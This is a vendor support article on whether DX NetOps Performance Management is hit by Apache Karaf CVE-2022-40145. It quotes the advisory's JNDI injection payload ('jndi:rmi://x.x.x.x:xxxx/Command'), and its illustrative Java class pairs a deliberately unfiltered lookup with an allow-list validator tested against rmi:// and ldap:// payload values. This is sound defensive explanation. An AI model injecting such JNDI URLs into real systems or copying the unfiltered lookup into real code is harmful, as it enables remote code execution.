Is DX NetOps Performance Management affected by the Karaf vulnerability CVE-2022-40145?
Details on this vulnerability:
https://karaf.apache.org/security/cve-2022-40145.txt
CVE-2022-40145: LDAP injection vulnerability in JDBC Login Module with JDK 8

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected: all versions of Apache Karaf prior to 4.3.8 or 4.4.2

Description: This vulnerability is about a potential code injection when an attacker has control of the target LDAP server used in the JDBC JNDI URL. The method jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasourceuse uses InitialContext.lookup(jndiName) without filtering. A user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE, "jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI and an attacker has control of the target LDAP server.

This has been fixed in revision:
https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341
https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1

Mitigation: Apache Karaf users should upgrade to 4.3.8 or 4.4.2 or later as soon as possible, or use correct path.
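The following Java is an added illustration written for this article; it is not code from the Apache Karaf project or from DX NetOps Performance Management. It contrasts the unfiltered pattern the advisory describes (the value of the login module's datasource option is handed straight to InitialContext.lookup) with a hardened variant that refuses any JNDI name selecting a remote naming provider. The class name, the validateJndiName check and the sample option values are assumptions for illustration only; the check is not the upstream fix shipped in Karaf 4.3.8 / 4.4.2.

```java
import java.util.Arrays;
import java.util.List;
import java.util.Locale;
import javax.naming.InitialContext;
import javax.naming.NamingException;

/**
 * Illustrative example written for this article. Not Apache Karaf's JDBCUtils
 * and not DX NetOps Performance Management code. Contrasts the unfiltered JNDI
 * lookup described in CVE-2022-40145 with a hardened variant (an assumption,
 * not the upstream fix).
 */
public class JndiDatasourceLookup {

    static final String JNDI = "jndi:";

    // Vulnerable pattern: everything after "jndi:" goes to InitialContext.lookup()
    // unchanged. If the JAAS configuration carries
    //   datasource = jndi:rmi://x.x.x.x:xxxx/Command   (or an ldap:// URL)
    // the JNDI client connects to that host; with an attacker-controlled server
    // and a JDK (such as JDK 8) that still resolves remote references, this is RCE.
    static Object lookupUnfiltered(String datasourceOption) throws NamingException {
        String jndiName = datasourceOption.substring(JNDI.length());
        return new InitialContext().lookup(jndiName);
    }

    // Hardened variant (assumption): only scheme-less names and the in-JVM
    // "java:" namespace are accepted. Any other scheme (ldap, ldaps, rmi, iiop,
    // dns, corbaname, ...) would reach out to a network peer and is refused
    // before lookup() ever runs.
    static String validateJndiName(String datasourceOption) {
        if (datasourceOption == null || !datasourceOption.startsWith(JNDI)) {
            throw new IllegalArgumentException("datasource option must start with '" + JNDI + "'");
        }
        String jndiName = datasourceOption.substring(JNDI.length()).trim();
        if (jndiName.isEmpty()) {
            throw new IllegalArgumentException("empty JNDI name");
        }
        int colon = jndiName.indexOf(':');
        if (colon >= 0) {
            String scheme = jndiName.substring(0, colon).toLowerCase(Locale.ROOT);
            if (!scheme.equals("java")) {
                throw new IllegalArgumentException(
                        "refusing remote JNDI scheme '" + scheme + ":' in datasource name");
            }
        }
        return jndiName;
    }

    // Same lookup, but only after the name has passed the allow-list above.
    static Object lookupFiltered(String datasourceOption) throws NamingException {
        return new InitialContext().lookup(validateJndiName(datasourceOption));
    }

    public static void main(String[] args) {
        // Constructed sample values for the login module's "datasource" option.
        // "osgi:" values are handled by a separate code path in the real module;
        // this validator only covers the "jndi:" form, so it rejects them.
        List<String> samples = Arrays.asList(
                "jndi:java:comp/env/jdbc/karaf",      // local java: namespace, accepted
                "jndi:jdbc/karaf",                    // scheme-less, accepted
                "jndi:rmi://x.x.x.x:1099/Command",    // shape of the advisory's payload, rejected
                "jndi:ldap://x.x.x.x:389/cn=Command", // LDAP variant, rejected
                "osgi:javax.sql.DataSource");         // not a jndi: option, rejected here
        for (String s : samples) {
            try {
                System.out.println("ACCEPT " + s + " -> lookup name '" + validateJndiName(s) + "'");
            } catch (IllegalArgumentException e) {
                System.out.println("REJECT " + s + " (" + e.getMessage() + ")");
            }
        }
    }
}
```

Compile and run with `javac JndiDatasourceLookup.java && java JndiDatasourceLookup`; main only exercises the validator, so no JNDI provider is needed. Filtering like this is the "use correct path" mitigation from the advisory made explicit; it narrows the exposure but does not replace upgrading Karaf to 4.3.8 or 4.4.2 or later.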
Release: 21.2.x - 22.2.x
NetOps Performance Management is not affected by this vulnerability: it does not run on JDK 8 and does not use the vulnerable Karaf JDBC login module (JDBCUtils), so the unfiltered JNDI lookup described in the advisory is not in use.
In addition, NetOps Performance Management release 22.2.5 will deliver Karaf 4.3.8, the version in which this issue is fixed, to address other vulnerabilities.